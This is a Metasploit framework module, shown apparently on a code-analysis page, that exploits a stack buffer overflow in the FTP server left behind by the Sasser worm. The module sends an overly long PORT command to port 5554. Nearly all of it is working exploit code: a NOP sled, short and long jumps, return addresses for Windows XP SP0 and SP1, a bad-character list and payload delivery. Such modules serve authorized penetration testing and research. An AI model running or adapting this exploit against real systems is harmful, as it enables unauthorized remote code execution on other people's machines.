modules/exploits/windows/ftp/sasser_ftpd_port.rb from rapid7/metasploit-framework

modules/exploits/windows/ftp/sasser_ftpd_port.rb
Summary

Maintainability

1 hr
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Sasser Worm avserve FTP PORT Buffer Overflow',
      'Description'    => %q{
          This module exploits the FTP server component of the Sasser worm.
        By sending an overly long PORT command the stack can be overwritten.
      },
      'Author'    => [ '<valsmith[at]metasploit.com>', '<chamuco[at]gmail.com>', 'aushack' ],
      'Arch'        => [ ARCH_X86 ],
      'License'    => MSF_LICENSE,
      'References'    =>
        [
          [ 'OSVDB', '6197'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform'     => ['win'],
      'Privileged'    => false,
      'Payload'    =>
        {
          'Space'            => 480,
          'BadChars'        => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          'StackAdjustment'    => -3500,
        },
      'Targets'     =>
      [
        [ 'Windows XP SP0', { 'Ret' => 0x71aa32ad } ], #p/p/r ws2help.dll
        [ 'Windows XP SP1', { 'Ret' => 0x77e7633a } ], #p/p/r
      ],
      'DisclosureDate' => '2004-05-10',
      'DefaultTarget' => 1))

    register_options(
      [
        Opt::RPORT(5554),
      ])
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    sploit = make_nops(267) + Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target['Ret']].pack('V')
    sploit << Rex::Arch::X86.jmp(0xfffffc13) + make_nops(15) + payload.encoded + make_nops(1530)

    send_cmd( ['PORT', sploit] , false)

    handler
    disconnect
  end
end